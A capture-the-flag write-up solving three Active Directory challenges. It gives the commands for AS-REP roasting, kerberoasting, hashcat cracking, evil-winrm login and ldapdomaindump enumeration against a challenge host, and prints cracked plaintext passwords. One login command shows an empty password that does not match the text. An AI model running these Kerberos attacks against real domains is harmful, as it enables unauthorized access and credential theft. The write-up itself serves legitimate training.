# Blemflarck This challenge is related to Active Directory in which we are given these files, `admins.txt` , `hosts` and `nmap.txt` admins.txt contains a list of usernames nmap.txt contains result of nmap of the domain controller and `hosts` contains the IP and domain name of the target Now to start solving this, we have a list of usernames of the domain, need to verfiy which users are valid on the domain for that we can use `kerbrute` We can try performing AS-REP roasting using `GetNPUsers` from `impacket` in which the user `shreya` doesn't have pre-authentication set so without providing a valid password for the user we can request for his TGT ```bash GetNPUsers.py vindicators.space/ -usersfile ./admins.txt -request ``` To crack this we can use `hashcat` with mode `18200 ```bash hashcat -a 0 -m 18200 ./hash.txt /usr/share/wordlists/rockyou.txt --force ``` This will crack the hash with password `$anturce77RioGr@ndePR` Now having the credentials we can login through WinRM which is running on port 5985 using `evil-winrm` ```bash evil-winrm -i 34.218.188.252 -u 'shreya' -p '' ``` After logging in we can get the flag for this challenge ## PhoenixPerson This challenge is continuation from the first one, we have a valid set of credential, we can try using kerberoasting, if there's a SPN tied to an account we can request for TGS and later crack it ```bash GetUserSPNs.py vindicators.space/shreya -request ``` Runing hashcat to crack this hash Now logging with mirage user ```bash evil-winrm -i 34.218.188.252 -u 'mirage' -p '!@#New_Life87!@#' ``` ## DAB-389 b This challenge is the last part of AD category where we need to find the third flag through the user `mirage` From the description the number 389 is referrenced as LDAP which is the port number for that service, we need to enumerate LDAP, there's a tool called `ldapdomaindump` ```bash ldapdomaindump -u 'mirage' -p '!@#New_Life87!@#' ldap://34.218.188.252 ``` This will generate some html files for users, groups and computers in the domain, going through the `domain_users.html` file we'll get the first part of the flag The second part will be found from `domain_computers.html` And the third one from `domain_groups.html` We can get the flag through `grep` as well by using regular expression Which makes the final flag ``` flag{3fe05494a09ac38bb5199698b475c48c_LD4P_3num3r4t10n_FTW_:)} ``` There were good challenges and a lot of categories including web3, cloud and source code review which I haven't done before, due to me doing "real world assesments" I wasn't able to touch the rest of the challenges ## References - https://hashcat.net/wiki/doku.php?id=example_hashes - https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a - https://www.cyberciti.biz/faq/grep-regular-expressions/